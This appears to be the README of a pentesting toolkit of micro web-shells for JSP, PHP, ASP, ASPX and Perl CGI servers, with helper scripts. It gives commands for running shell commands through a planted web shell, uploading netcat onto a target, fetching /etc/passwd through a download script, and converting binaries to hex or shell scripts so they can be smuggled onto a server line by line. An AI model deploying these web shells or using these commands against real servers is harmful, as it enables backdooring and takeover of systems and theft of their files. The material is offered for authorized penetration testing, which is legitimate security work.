Micro web-shells for pentesting.
- Minimalistic web-shell.
- Multiplatform.
- Source IP protection.
- uws.jsp : java micro web shell, tested in linux/tomcat
- uws.php : php web shell, tested in linux/apache
- uws.asp : asp web shell, tested in winxp/iis
- uws.aspx : aspx web shell, tested in win2k3/iis
- uws.cgi : perl-cgi web shell, tested in linux/apache
- download.php, upload.php
- binhex, hexbin
- bin2sh
- wsh
These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.
Binaries should compile/run on any Win32 or UNIX/Linux box. You only need a relatively modern C compiler.
Download a copy of the project from github:
$ git clone https://github.com/joseigbv/uws.git
Compile tools.
$ gcc -Wall -O2 binhex.c -o binhex
Select web-shell and edit "REMOTEIP" to limit access.
It may be necessary to adapt the commands according to the target technology (linux or windows) (uuencode, uudecode, cmd, sh, cat, ...)
For Apache Tomcat build .WAR using genwar.sh
wsh.sh: "client" for remote web shell with history
$ ./wsh.sh http://localhost:8080/uws.jsp
wsh> pwd
upload_b64.sh: files upload using micro web shell and base64 encoding.
$ ./upload_b64.sh http://localhost:8080/uws.jsp /bin/nc /tmp/ncx
Uploading file...................................... done!
download_b64.sh: download files using micro web shell and base64 encoding.
$ ./download_b64.sh http://localhost:8080/hoolista/hoolista.jsp /bin/nc /tmp/nc
upload.php: text/binary files upload.
$ curl -F file=@/bin/lss http://localhost/upload.php
download.php: text/binary files download.
$ curl http://localhost/download.php?file=/etc/passwd
binhex: converts binary file to text file with hexadecimal representation of bytes.
$ ./binhex < /bin/nc > nc.hex
hexbin: convert text file with hexadecimal representation of bytes to binary file.
$ ./hexbin < nc.hex > /bin/nc
bin2sh: converts binary to shell script, when executed it regenerates binary; useful to upload line by line.
$ ./bin2sh < /bin/nc > nc.sh
$ ./nc.sh > /bin/nc
- José Ignacio Bravo - Initial work - [email protected]
This project is licensed under the MIT License - see the LICENSE file for details